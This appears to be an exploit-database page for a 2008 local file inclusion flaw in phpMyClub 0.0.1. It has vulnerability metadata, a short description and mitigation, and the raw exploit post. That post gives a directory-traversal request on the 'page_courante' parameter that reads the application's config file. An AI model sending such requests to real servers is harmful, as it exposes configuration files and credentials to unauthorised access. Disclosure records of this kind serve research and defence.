header-logo
Suggest Exploit
vendor:
phpMyClub
by:
S.W.A.T.
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: phpMyClub
Affected Version From: 0.0.1
Affected Version To: 0.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:phpmyclub:phpmyclub:0.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

phpMyClub Local File Inclusion Vulnerability

A Local File Inclusion vulnerability exists in phpMyClub, which allows an attacker to include a file from the local system. The vulnerability is due to insufficient sanitization of user-supplied input to the 'page_courante' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters ('../') to the vulnerable script. This can allow the attacker to include arbitrary files from the local system, resulting in the disclosure of sensitive information.

Mitigation:

Input validation should be used to prevent directory traversal attacks. All user-supplied input should be validated and filtered for malicious characters.
Source

Exploit-DB raw data:

## phpMyClub Local File Inclusion Vulnerability  

## Download script :
http://ovh.dl.sourceforge.net/sourceforge/phpmyclub/phpMyClub-0.0.1.zip

## Author : S.W.A.T.

## E-Mail : svvateam@yahoo.com - swat@svvat.ir

## Home : http://svvat.ir

## For Execute Exploit Does Not Write Extention Of
File

## example : [script]/?page_courante=../config/config

## exploit :

## http://localhost/[script]/?page_courante=../[name of file without .php]
##
http://localhost/[script]/?page_courante=../config/config

## Greetz:

## Xmors Digital Security Team - Str0ke - Dj7xpl - DarKLiFe - NazNazi

## In Portland Now - Maybe I Can't See IRAN Anyway (
This Is Really Bye NET  :(  For Ever )

  
#########################################################################
   #								           #
   #   BYE ALL MY FRIENDS OVER THE NET & EVERYTHING ON THE NET             #
   #								           #
   #########################################################################


# milw0rm.com [2008-01-28]

Navigation

Suggest Exploit

Services By CQR